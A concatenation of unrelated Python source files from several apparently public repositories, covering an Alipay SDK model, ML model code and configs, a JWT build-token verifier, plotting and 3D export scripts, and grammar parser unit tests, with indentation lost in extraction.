@cpws_list.setter
def cpws_list(self, value):
if isinstance(value, list):
self._cpws_list = list()
for i in value:
if isinstance(i, EpInfo):
self._cpws_list.append(i)
else:
self._cpws_list.append(EpInfo.from_alipay_dict(i))
@property
def sxgg_list(self):
return self._sxgg_list
@sxgg_list.setter
def sxgg_list(self, value):
if isinstance(value, list):
self._sxgg_list = list()
for i in value:
if isinstance(i, EpInfo):
self._sxgg_list.append(i)
else:
self._sxgg_list.append(EpInfo.from_alipay_dict(i))
@property
def zxgg_list(self):
return self._zxgg_list
@zxgg_list.setter
def zxgg_list(self, value):
if isinstance(value, list):
self._zxgg_list = list()
for i in value:
if isinstance(i, EpInfo):
self._zxgg_list.append(i)
else:
self._zxgg_list.append(EpInfo.from_alipay_dict(i))
def to_alipay_dict(self):
params = dict()
if self.bgt_list:
if isinstance(self.bgt_list, list):
for i in range(0, len(self.bgt_list)):
element = self.bgt_list[i]
if hasattr(element, 'to_alipay_dict'):
self.bgt_list[i] = element.to_alipay_dict()
if hasattr(self.bgt_list, 'to_alipay_dict'):
params['bgt_list'] = self.bgt_list.to_alipay_dict()
else:
params['bgt_list'] = self.bgt_list
if self.cpws_list:
if isinstance(self.cpws_list, list):
for i in range(0, len(self.cpws_list)):
element = self.cpws_list[i]
if hasattr(element, 'to_alipay_dict'):
self.cpws_list[i] = element.to_alipay_dict()
if hasattr(self.cpws_list, 'to_alipay_dict'):
params['cpws_list'] = self.cpws_list.to_alipay_dict()
else:
params['cpws_list'] = self.cpws_list
if self.sxgg_list:
if isinstance(self.sxgg_list, list):
for i in range(0, len(self.sxgg_list)):
element = self.sxgg_list[i]
if hasattr(element, 'to_alipay_dict'):
self.sxgg_list[i] = element.to_alipay_dict()
if hasattr(self.sxgg_list, 'to_alipay_dict'):
params['sxgg_list'] = self.sxgg_list.to_alipay_dict()
else:
params['sxgg_list'] = self.sxgg_list
if self.zxgg_list:
if isinstance(self.zxgg_list, list):
for i in range(0, len(self.zxgg_list)):
element = self.zxgg_list[i]
if hasattr(element, 'to_alipay_dict'):
self.zxgg_list[i] = element.to_alipay_dict()
if hasattr(self.zxgg_list, 'to_alipay_dict'):
params['zxgg_list'] = self.zxgg_list.to_alipay_dict()
else:
params['zxgg_list'] = self.zxgg_list
return params
@staticmethod
def from_alipay_dict(d):
if not d:
return None
o = LawsuitPersonRecord()
if 'bgt_list' in d:
o.bgt_list = d['bgt_list']
if 'cpws_list' in d:
o.cpws_list = d['cpws_list']
if 'sxgg_list' in d:
o.sxgg_list = d['sxgg_list']
if 'zxgg_list' in d:
o.zxgg_list = d['zxgg_list']
return o
|
models/baseline_config.py | SonjaAits/MTL-Bioinformatics-2016 | 171 | 12687628 | class Defaults(object):
window_size = 7
hidden_sizes = [300]
hidden_activation = 'relu'
max_vocab_size = 1000000
optimizer = 'sgd' # 'adam'
learning_rate = 0.1 # 1e-4
epochs = 20
iobes = True # Map tags to IOBES on input
max_tokens = None # Max dataset size in tokens
encoding = 'utf-8' # Data encoding
output_drop_prob = 0.0 # Dropout probablility prior to output
token_level_eval = False # Force token-level evaluation
verbosity = 1 # 0=quiet, 1=progress bar, 2=one line per epoch
fixed_wordvecs = False # Don't fine-tune word vectors
word_features = True
batch_size = 50
viterbi = True
# Learning rate multiplier for embeddings. This is a tweak to
# implement faster learning for embeddings compared to other
# layers. As the feature is not yet implemented in Keras master
# (see https://github.com/fchollet/keras/pull/1991), this option
# currently requires the fork https://github.com/spyysalo/keras .
embedding_lr_multiplier = 1.0
|
firefly/management/commands/reloadmodule.py | genghaolove/firefly | 675 | 12687642 | #coding:utf8
'''
Created on 2013-8-12
@author: lan (www.9miao.com)
'''
import urllib,sys
def execute(*args):
"""
"""
if not args:
masterport =9998
else:
masterport = int(args[0])
url = "http://localhost:%s/reloadmodule"%masterport
try:
response = urllib.urlopen(url)
except:
response = None
if response:
sys.stdout.write("reload module success \n")
else:
sys.stdout.write("reload module failed \n") |
fastfold/model/nn/template.py | hpcaitech/FastFold | 303 | 12687654 | # Copyright 2021 AlQuraishi Laboratory
# Copyright 2021 DeepMind Technologies Limited
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from functools import partial
import math
from typing import Optional, List
import torch
import torch.nn as nn
from fastfold.model.nn.primitives import Linear, LayerNorm, Attention
from fastfold.model.nn.dropout import (
DropoutRowwise,
DropoutColumnwise,
)
from fastfold.model.nn.pair_transition import PairTransition
from fastfold.model.nn.triangular_attention import (
TriangleAttentionStartingNode,
TriangleAttentionEndingNode,
)
from fastfold.model.nn.triangular_multiplicative_update import (
TriangleMultiplicationOutgoing,
TriangleMultiplicationIncoming,
)
from fastfold.utils.checkpointing import checkpoint_blocks
from fastfold.utils.tensor_utils import (
chunk_layer,
permute_final_dims,
flatten_final_dims,
)
class TemplatePointwiseAttention(nn.Module):
"""
Implements Algorithm 17.
"""
def __init__(self, c_t, c_z, c_hidden, no_heads, inf, **kwargs):
"""
Args:
c_t:
Template embedding channel dimension
c_z:
Pair embedding channel dimension
c_hidden:
Hidden channel dimension
"""
super(TemplatePointwiseAttention, self).__init__()
self.c_t = c_t
self.c_z = c_z
self.c_hidden = c_hidden
self.no_heads = no_heads
self.inf = inf
self.mha = Attention(
self.c_z,
self.c_t,
self.c_t,
self.c_hidden,
self.no_heads,
gating=False,
)
def _chunk(self,
z: torch.Tensor,
t: torch.Tensor,
biases: List[torch.Tensor],
chunk_size: int,
) -> torch.Tensor:
mha_inputs = {
"q_x": z,
"kv_x": t,
"biases": biases,
}
return chunk_layer(
self.mha,
mha_inputs,
chunk_size=chunk_size,
no_batch_dims=len(z.shape[:-2]),
)
def forward(self,
t: torch.Tensor,
z: torch.Tensor,
template_mask: Optional[torch.Tensor] = None,
chunk_size: Optional[int] = None
) -> torch.Tensor:
"""
Args:
t:
[*, N_templ, N_res, N_res, C_t] template embedding
z:
[*, N_res, N_res, C_t] pair embedding
template_mask:
[*, N_templ] template mask
Returns:
[*, N_res, N_res, C_z] pair embedding update
"""
if template_mask is None:
template_mask = t.new_ones(t.shape[:-3])
bias = self.inf * (template_mask[..., None, None, None, None, :] - 1)
# [*, N_res, N_res, 1, C_z]
z = z.unsqueeze(-2)
# [*, N_res, N_res, N_temp, C_t]
t = permute_final_dims(t, (1, 2, 0, 3))
# [*, N_res, N_res, 1, C_z]
biases = [bias]
if chunk_size is not None:
z = self._chunk(z, t, biases, chunk_size)
else:
z = self.mha(q_x=z, kv_x=t, biases=biases)
# [*, N_res, N_res, C_z]
z = z.squeeze(-2)
return z
class TemplatePairStackBlock(nn.Module):
def __init__(
self,
c_t: int,
c_hidden_tri_att: int,
c_hidden_tri_mul: int,
no_heads: int,
pair_transition_n: int,
dropout_rate: float,
inf: float,
**kwargs,
):
super(TemplatePairStackBlock, self).__init__()
self.c_t = c_t
self.c_hidden_tri_att = c_hidden_tri_att
self.c_hidden_tri_mul = c_hidden_tri_mul
self.no_heads = no_heads
self.pair_transition_n = pair_transition_n
self.dropout_rate = dropout_rate
self.inf = inf
self.dropout_row = DropoutRowwise(self.dropout_rate)
self.dropout_col = DropoutColumnwise(self.dropout_rate)
self.tri_att_start = TriangleAttentionStartingNode(
self.c_t,
self.c_hidden_tri_att,
self.no_heads,
inf=inf,
)
self.tri_att_end = TriangleAttentionEndingNode(
self.c_t,
self.c_hidden_tri_att,
self.no_heads,
inf=inf,
)
self.tri_mul_out = TriangleMultiplicationOutgoing(
self.c_t,
self.c_hidden_tri_mul,
)
self.tri_mul_in = TriangleMultiplicationIncoming(
self.c_t,
self.c_hidden_tri_mul,
)
self.pair_transition = PairTransition(
self.c_t,
self.pair_transition_n,
)
def forward(self,
z: torch.Tensor,
mask: torch.Tensor,
chunk_size: Optional[int] = None,
_mask_trans: bool = True
):
single_templates = [
t.unsqueeze(-4) for t in torch.unbind(z, dim=-4)
]
single_templates_masks = [
m.unsqueeze(-3) for m in torch.unbind(mask, dim=-3)
]
for i in range(len(single_templates)):
single = single_templates[i]
single_mask = single_templates_masks[i]
single = single + self.dropout_row(
self.tri_att_start(
single,
chunk_size=chunk_size,
mask=single_mask
)
)
single = single + self.dropout_col(
self.tri_att_end(
single,
chunk_size=chunk_size,
mask=single_mask
)
)
single = single + self.dropout_row(
self.tri_mul_out(
single,
mask=single_mask
)
)
single = single + self.dropout_row(
self.tri_mul_in(
single,
mask=single_mask
)
)
single = single + self.pair_transition(
single,
mask=single_mask if _mask_trans else None,
chunk_size=chunk_size,
)
single_templates[i] = single
z = torch.cat(single_templates, dim=-4)
return z
class TemplatePairStack(nn.Module):
"""
Implements Algorithm 16.
"""
def __init__(
self,
c_t,
c_hidden_tri_att,
c_hidden_tri_mul,
no_blocks,
no_heads,
pair_transition_n,
dropout_rate,
blocks_per_ckpt,
inf=1e9,
**kwargs,
):
"""
Args:
c_t:
Template embedding channel dimension
c_hidden_tri_att:
Per-head hidden dimension for triangular attention
c_hidden_tri_att:
Hidden dimension for triangular multiplication
no_blocks:
Number of blocks in the stack
pair_transition_n:
Scale of pair transition (Alg. 15) hidden dimension
dropout_rate:
Dropout rate used throughout the stack
blocks_per_ckpt:
Number of blocks per activation checkpoint. None disables
activation checkpointing
"""
super(TemplatePairStack, self).__init__()
self.blocks_per_ckpt = blocks_per_ckpt
self.blocks = nn.ModuleList()
for _ in range(no_blocks):
block = TemplatePairStackBlock(
c_t=c_t,
c_hidden_tri_att=c_hidden_tri_att,
c_hidden_tri_mul=c_hidden_tri_mul,
no_heads=no_heads,
pair_transition_n=pair_transition_n,
dropout_rate=dropout_rate,
inf=inf,
)
self.blocks.append(block)
self.layer_norm = LayerNorm(c_t)
def forward(
self,
t: torch.tensor,
mask: torch.tensor,
chunk_size: int,
_mask_trans: bool = True,
):
"""
Args:
t:
[*, N_templ, N_res, N_res, C_t] template embedding
mask:
[*, N_templ, N_res, N_res] mask
Returns:
[*, N_templ, N_res, N_res, C_t] template embedding update
"""
if(mask.shape[-3] == 1):
expand_idx = list(mask.shape)
expand_idx[-3] = t.shape[-4]
mask = mask.expand(*expand_idx)
t, = checkpoint_blocks(
blocks=[
partial(
b,
mask=mask,
chunk_size=chunk_size,
_mask_trans=_mask_trans,
)
for b in self.blocks
],
args=(t,),
blocks_per_ckpt=self.blocks_per_ckpt if self.training else None,
)
t = self.layer_norm(t)
return t
|
buildman/build_token.py | giuseppe/quay | 2,027 | 12687670 | <filename>buildman/build_token.py
import jsonschema
import jwt
import logging
from app import instance_keys
from util.security import jwtutil
from util.security.registry_jwt import (
generate_bearer_token,
InvalidBearerTokenException,
ALGORITHM,
JWT_CLOCK_SKEW_SECONDS,
)
logger = logging.getLogger(__name__)
ANONYMOUS_SUB = "(anonymous)"
BUILD_JOB_REGISTRATION_TYPE = "build_job_registration"
BUILD_JOB_TOKEN_TYPE = "build_job_token"
BUILD_TOKEN_CONTEXT_SCHEMA = {
"type": "object",
"description": "Build context",
"required": ["token_type", "build_id", "job_id", "expiration"],
"properties": {
"token_type": {
"type": "string",
"description": "The build token type",
},
"build_id": {
"type": "string",
"description": "The build id",
},
"job_id": {
"type": "string",
"description": "The job id",
},
"expiration": {
"type": "number",
"description": "The number of seconds until the job expires",
},
},
}
class InvalidBuildTokenException(Exception):
pass
def build_token(aud, token_type, build_id, job_id, expiration, instance_keys):
"""Returns an encoded JWT for the given build, signed by the local instance's private."""
token_data = {
"token_type": token_type,
"build_id": build_id,
"job_id": job_id,
"expiration": expiration,
}
token = generate_bearer_token(aud, ANONYMOUS_SUB, token_data, {}, expiration, instance_keys)
return token.decode("utf-8")
def verify_build_token(token, aud, token_type, instance_keys):
"""Verify the JWT build token."""
try:
headers = jwt.get_unverified_header(token)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
kid = headers.get("kid", None)
if kid is None:
logger.error("Missing kid header on encoded JWT: %s", token)
raise InvalidBuildTokenException("Missing kid header")
public_key = instance_keys.get_service_key_public_key(kid)
if public_key is None:
logger.error("Could not find requested service key %s with encoded JWT: %s", kid, token)
raise InvalidBuildTokenException("Unknown service key")
try:
payload = jwtutil.decode(
token,
public_key,
verify=True,
algorithms=[ALGORITHM],
audience=aud,
issuer=instance_keys.service_name,
leeway=JWT_CLOCK_SKEW_SECONDS,
)
except jwtutil.InvalidTokenError as ite:
logger.error("Invalid token reason: %s", ite)
raise InvalidBuildTokenException(ite)
if "sub" not in payload:
raise InvalidBuildTokenException("Missing sub field in JWT")
if payload["sub"] != ANONYMOUS_SUB:
raise InvalidBuildTokenException("Wrong sub field in JWT")
if (
"context" not in payload
or not payload["context"]["token_type"]
or not payload["context"]["build_id"]
or not payload["context"]["job_id"]
or not payload["context"]["expiration"]
):
raise InvalidBuildTokenException("Missing context field in JWT")
try:
jsonschema.validate(payload["context"], BUILD_TOKEN_CONTEXT_SCHEMA)
except jsonschema.ValidationError:
raise InvalidBuildTokenException(
"Unable to validate build token context schema: malformed context"
)
if payload["context"]["token_type"] != token_type:
raise InvalidBuildTokenException(
"Build token type in JWT does not match expected type: %s" % token_type
)
return payload
|
examples/plot/plot_wine.py | adekunleba/dabl | 500 | 12687703 | """
Wine Classification Dataset Visualization
==========================================
"""
# sphinx_gallery_thumbnail_number = 4
import matplotlib.pyplot as plt
from sklearn.datasets import load_wine
from dabl import plot
from dabl.utils import data_df_from_bunch
wine_bunch = load_wine()
wine_df = data_df_from_bunch(wine_bunch)
plot(wine_df, 'target')
plt.show()
|
data/4 - C4DPy/export_stdface.py | dot-by-dot-inc/KAMRA-Deja-Vu | 154 | 12687736 | from djv import *
#========================================
# config
faceObj = doc.SearchObject("face_original")
hullObj = doc.SearchObject("face_hull")
TRIANGLE = 0b0
QUAD = 0b1
FACE_UV = 0b100
FACE_VERTEX_UV = 0b1000
FACE_VERTEX_NORMAL = 0b100000
#========================================
def main():
#===================================
# face
points = faceObj.GetAllPoints()
facePoints = points[:eyemouthVertexIndex]
eyemouthPoints = points[eyemouthVertexIndex:]
polygons = faceObj.GetAllPolygons()
facePolygons = polygons[:eyemouthFaceIndex]
eyemouthPolygons = polygons[eyemouthFaceIndex:]
normals = faceObj.CreatePhongNormals()
faceNormals = normals[:eyemouthFaceIndex*3]
eyemouthNormals = normals[eyemouthFaceIndex*3:]
faceModel = getThreeJson(facePoints, facePolygons, faceNormals)
faceModel["name"] = "face"
with open("%s/0b/data/3 - JSON/face.json" % (projDir), 'w') as outFile:
json.dump(faceModel, outFile, separators=(',',':'))
#===================================
# eyemouth
for poly in eyemouthPolygons:
poly.a -= eyemouthVertexIndex
poly.b -= eyemouthVertexIndex
poly.c -= eyemouthVertexIndex
poly.d -= eyemouthVertexIndex
# fill mouth manually
mouthVertexOffset = len(eyemouthPoints)
eyemouthPoints.extend([points[i] for i in mouthVertexIndices])
print len(eyemouthPoints)
for poly in mouthPolygons:
cpoly = c4d.CPolygon(
poly[0] + mouthVertexOffset,
poly[2] + mouthVertexOffset,
poly[1] + mouthVertexOffset)
eyemouthPolygons.append(cpoly)
eyemouthModel = getThreeJson(eyemouthPoints, eyemouthPolygons, eyemouthNormals)
eyemouthModel["name"] = "eyemouth"
with open("%s/0b/data/3 - JSON/eyemouth.json" % (projDir), 'w') as outFile:
json.dump(eyemouthModel, outFile, separators=(',',':'))
#===================================
# face_hull
# points = hullObj.GetAllPoints()
# polygons = hullObj.GetAllPolygons()
# normals = hullObj.CreatePhongNormals()
# hullModel = getThreeJson(points, polygons, normals)
# hullModel["name"] = "face_hull"
# with open("%s/0b/data/3 - JSON/face_hull.json" % (projDir), 'w') as outFile:
# json.dump(hullModel, outFile, separators=(',',':'))
# print "END"
def getThreeJson(points, polygons, normals):
# face
normalsForIndex = [None for pt in points]
faceArray = []
for i, poly in enumerate(polygons):
faceArray.append(
# FACE_VERTEX_NORMAL |
TRIANGLE
)
if poly.IsTriangle():
faceArray.extend([poly.a, poly.c, poly.b])
faceArray.extend([poly.a, poly.c, poly.b])
# normalsForIndex[poly.a] = normals[i*3]
# normalsForIndex[poly.b] = normals[i*3+1]
# normalsForIndex[poly.c] = normals[i*3+2]
else:
print "ERROR", i
return
vertexArray = []
for pt in points:
pt = toFaceVertex(pt)
vertexArray.extend(pt)
# normals
# normalArray = []
# for norm in normalsForIndex:
# norm = toPosition(norm)
# normalArray.extend(norm)
return {
"metadata": {
"type": "Geometry",
"faces": len(polygons),
"vertices": len(points),
# "normals": len(points),
"generator": "io_three",
"version": 3
},
"vertices": vertexArray,
"faces": faceArray,
# "normals": normalArray
}
if __name__=='__main__':
main() |
aws_lambda_powertools/metrics/__init__.py | Sordie/aws-lambda-powertools-python | 1,208 | 12687744 | <gh_stars>1000+
"""CloudWatch Embedded Metric Format utility
"""
from .base import MetricUnit
from .exceptions import MetricUnitError, MetricValueError, SchemaValidationError
from .metric import single_metric
from .metrics import Metrics
__all__ = [
"Metrics",
"single_metric",
"MetricUnit",
"MetricUnitError",
"SchemaValidationError",
"MetricValueError",
]
|
neural_guided_symbolic_regression/utils/arithmetic_grammar_test.py | deepneuralmachine/google-research | 23,901 | 12687748 | <reponame>deepneuralmachine/google-research
# coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for arithmetic_grammar."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from absl.testing import parameterized
import numpy as np
from six.moves import map
import tensorflow.compat.v1 as tf
from neural_guided_symbolic_regression.utils import arithmetic_grammar
class ReadGrammarFromFileTest(tf.test.TestCase):
def setUp(self):
super(ReadGrammarFromFileTest, self).setUp()
# NLTK grammar use double quotes for production rules.
# pylint: disable=g-inconsistent-quotes
self.expected_set = set([
"S -> S '+' T",
"S -> S '-' T",
"S -> S '*' T",
"S -> S '/' T",
"S -> T",
"T -> '(' S ')'",
"T -> 'x'",
"T -> '1'",
])
# pylint: enable=g-inconsistent-quotes
def test_read_grammar_return_grammar(self):
grammar = arithmetic_grammar.read_grammar_from_file(
'third_party/google_research/google_research/'
'neural_guided_symbolic_regression/grammar/'
'univariate_one_constant_grammar.txt',
return_list=False)
production_rules_set = set(map(str, grammar.productions()))
self.assertEqual(production_rules_set, self.expected_set)
def test_read_grammar_return_list(self):
grammar = arithmetic_grammar.read_grammar_from_file(
'third_party/google_research/google_research/'
'neural_guided_symbolic_regression/grammar/'
'univariate_one_constant_grammar.txt',
return_list=True)
production_rules_set = set(map(str, grammar))
self.assertEqual(production_rules_set, self.expected_set)
class ArithmeticGrammarTest(parameterized.TestCase, tf.test.TestCase):
def test_input_grammar_rules_not_list(self):
with self.assertRaisesRegex(ValueError,
'The input grammar_rules should be list.'):
arithmetic_grammar.Grammar('foo')
def test_input_grammar_rules_not_unique(self):
with self.assertRaisesRegex(ValueError,
'The grammar production rules are not unique.'):
arithmetic_grammar.Grammar(['foo', 'foo'])
def test_input_grammar_rules_contain_padding_dummy_production_rule(self):
# If dummy production rule exists in the input grammar rules, it will be
# duplicated with the dummy production rule appended in the
# arithmetic_grammar.
with self.assertRaisesRegex(ValueError,
'The grammar production rules are not unique.'):
arithmetic_grammar.Grammar(['foo', 'Nothing -> None'])
def test_input_grammar_rules_not_change(self):
grammar_rules = ['S -> T', 'T -> "x"']
arithmetic_grammar.Grammar(grammar_rules)
self.assertListEqual(grammar_rules, ['S -> T', 'T -> "x"'])
def test_basic_production_rules(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
self.assertLen(grammar.prod_rules, 5)
self.assertEqual(grammar.num_production_rules, 5)
self.assertEqual(grammar.padding_rule_index, 4)
self.assertEqual(grammar.start_index.symbol(), 'S')
self.assertEqual(str(grammar.start_rule), "S -> S '+' T")
self.assertEqual(grammar.unique_lhs, ['Nothing', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 3)
np.testing.assert_allclose(
grammar.masks,
[[0., 0., 0., 0., 1.], [1., 1., 0., 0., 0.], [0., 0., 1., 1., 0.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[1, 1, 2, 2, 0])
self.assertEqual(grammar.prod_rule_rhs_indices, [[1, 2], [2], [1], [], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
def test_basic_production_rules_add_unique_production_rule_to_start(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(
grammar_rules, add_unique_production_rule_to_start=True)
self.assertLen(grammar.prod_rules, 6)
self.assertEqual(grammar.num_production_rules, 6)
self.assertEqual(grammar.padding_rule_index, 5)
self.assertEqual(grammar.start_index.symbol(), 'O')
self.assertEqual(str(grammar.start_rule), 'O -> S')
self.assertEqual(grammar.unique_lhs, ['Nothing', 'O', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 4)
np.testing.assert_allclose(
grammar.masks,
[[0., 0., 0., 0., 0., 1.],
[1., 0., 0., 0., 0., 0.],
[0., 1., 1., 0., 0., 0.],
[0., 0., 0., 1., 1., 0.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[1, 2, 2, 3, 3, 0])
self.assertEqual(grammar.prod_rule_rhs_indices,
[[2], [2, 3], [3], [2], [], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
def test_basic_production_rules_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
self.assertLen(grammar.prod_rules, 5)
self.assertEqual(grammar.num_production_rules, 5)
self.assertEqual(grammar.padding_rule_index, 0)
self.assertEqual(grammar.start_index.symbol(), 'S')
self.assertEqual(str(grammar.start_rule), "S -> S '+' T")
self.assertEqual(grammar.unique_lhs, ['Nothing', 'S', 'T'])
self.assertEqual(grammar.num_unique_lhs, 3)
np.testing.assert_allclose(
grammar.masks,
[[1., 0., 0., 0., 0.], [0., 1., 1., 0., 0.], [0., 0., 0., 1., 1.]])
np.testing.assert_allclose(grammar.prod_rule_index_to_lhs_index,
[0, 1, 1, 2, 2])
self.assertEqual(grammar.prod_rule_rhs_indices, [[], [1, 2], [2], [1], []])
self.assertEqual(grammar.max_rhs_indices_size, 2)
@parameterized.parameters([
(True, True, "\t0: S -> T\n\t1: T -> 'x'\n\t2: Nothing -> None\n"),
(True, False, "0: S -> T\n1: T -> 'x'\n2: Nothing -> None\n"),
(False, True, "\t0: Nothing -> None\n\t1: S -> T\n\t2: T -> 'x'\n"),
(False, False, "0: Nothing -> None\n1: S -> T\n2: T -> 'x'\n"),
])
def test_grammar_to_string(self, padding_at_end, indent, expected_string):
grammar_rules = [
'S -> T',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(
grammar_rules, padding_at_end=padding_at_end)
self.assertEqual(grammar.grammar_to_string(indent=indent), expected_string)
def test_invalid_grammar_string_no_space_before_arrow(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# No space between arrow and left hand side symbol.
arithmetic_grammar.Grammar(['a-> b'])
def test_invalid_grammar_string_no_space_after_arrow(self):
# No space between arrow and right hand side symbol.
# This is a valid input and should not raise error.
arithmetic_grammar.Grammar(['a ->b'])
def test_invalid_grammar_string_no_arrow(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with no arrow.
arithmetic_grammar.Grammar(['a b'])
def test_invalid_grammar_string_two_left_hand_side_symbols(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with more than one left hand side symbol.
arithmetic_grammar.Grammar(['a b -> c'])
def test_invalid_grammar_string_no_left_hand_side_symbol(self):
with self.assertRaisesRegex(ValueError, 'Unable to parse'):
# Invalid input with no left hand side symbol.
arithmetic_grammar.Grammar([' -> c'])
def test_invalid_grammar_string_empty_right_hand_side_symbol(self):
# No right hand side symbol.
# This is a valid input and should not raise error.
arithmetic_grammar.Grammar(['a -> '])
def test_parse_expressions_to_indices_sequences_input_not_list(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError, 'expression_strings is expected to be list, but got'):
grammar.parse_expressions_to_indices_sequences(
# Note the input expression_strings is a string not a list of strings.
expression_strings='x + ( x )',
max_length=8
)
def test_parse_expressions_to_indices_sequences_short_max_length(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError,
r'The number of production rules to parse expression .* '
'can not be greater than max_length'):
grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=2
)
def test_parse_expressions_to_indices_sequences_invalid_expression_string(
self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
with self.assertRaisesRegex(
ValueError, 'cannot be parsed to production rules'):
grammar.parse_expressions_to_indices_sequences(
expression_strings=['x x'],
max_length=8
)
def test_grammar_with_callables(self):
grammar_rules = [
'S -> S "+" S', # index 0
'S -> S "-" S', # index 1
'S -> "FUNCTION1(" P ")"', # index 2
'P -> T', # index 3
'P -> "1" "+" T', # index 4
'S -> T', # index 5
'T -> "FUNCTION2(" "x" "," "c" ")"', # index 6
] # padding rule index 7
grammar = arithmetic_grammar.Grammar(grammar_rules)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=[
'FUNCTION1( FUNCTION2( x , c ) ) - '
'FUNCTION2( x , c ) + FUNCTION2( x , c )'],
max_length=10
)
np.testing.assert_equal(
indices_sequences,
[
# Preorder traversal of parsing tree.
# S
# |
# S '+' S
# | |
# S '-' S T
# | | |
# 'FUNCTION1(' P ')' T 'FUNCTION2( x , c )'
# | |
# T 'FUNCTION2( x , c )'
# |
# 'FUNCTION2( x , c )'
[
0, # 'S -> S "+" S'
1, # 'S -> S "-" S'
2, # 'S -> "FUNCTION1(" P ")"'
3, # 'P -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
5, # 'S -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
5, # 'S -> T'
6, # 'T -> "FUNCTION2(" "x" "," "c" ")"'
7, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences(self):
grammar_rules = [
'S -> S "+" T', # index 0
'S -> T', # index 1
'T -> "(" S ")"', # index 2
'T -> "x"', # index 3
] # padding rule index 4
grammar = arithmetic_grammar.Grammar(grammar_rules)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
0, # 'S -> S "+" T'
1, # 'S -> T'
3, # 'T -> "x"'
2, # 'T -> "(" S ")"'
1, # 'S -> T'
3, # 'T -> "x"'
4, # Padding dummy production rule.
4, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences_padding_at_end_false(self):
grammar_rules = [
'S -> S "+" T', # index 1
'S -> T', # index 2
'T -> "(" S ")"', # index 3
'T -> "x"', # index 4
] # padding rule index 0
grammar = arithmetic_grammar.Grammar(grammar_rules, padding_at_end=False)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
1, # 'S -> S "+" T'
2, # 'S -> T'
4, # 'T -> "x"'
3, # 'T -> "(" S ")"'
2, # 'S -> T'
4, # 'T -> "x"'
0, # Padding dummy production rule.
0, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_indices_sequences_pad_front_unique_start(self):
grammar_rules = [
'S -> S "+" T', # index 2
'S -> T', # index 3
'T -> "(" S ")"', # index 4
'T -> "x"', # index 5
] # padding rule index 0
# 'O -> S' will be added with index 1.
grammar = arithmetic_grammar.Grammar(
grammar_rules,
padding_at_end=False,
add_unique_production_rule_to_start=True)
indices_sequences = grammar.parse_expressions_to_indices_sequences(
expression_strings=['x + ( x )'],
max_length=8
)
np.testing.assert_equal(
indices_sequences,
[
# Expression string: 'x + ( x )'
# Preorder traversal of parsing tree.
# O
# |
# S
# |
# S '+' T
# | |
# T '(' S ')'
# | |
# 'x' 'x'
[
1, # 'O -> S'
2, # 'S -> S "+" T'
3, # 'S -> T'
5, # 'T -> "x"'
4, # 'T -> "(" S ")"'
3, # 'S -> T'
5, # 'T -> "x"'
0, # Padding dummy production rule.
]
]
)
def test_parse_expressions_to_tensor(self):
grammar_rules = [
'S -> S "+" T',
'S -> T',
'T -> "(" S ")"',
'T -> "x"',
]
grammar = arithmetic_grammar.Grammar(grammar_rules)
expression_tensor = grammar.parse_expressions_to_tensor(
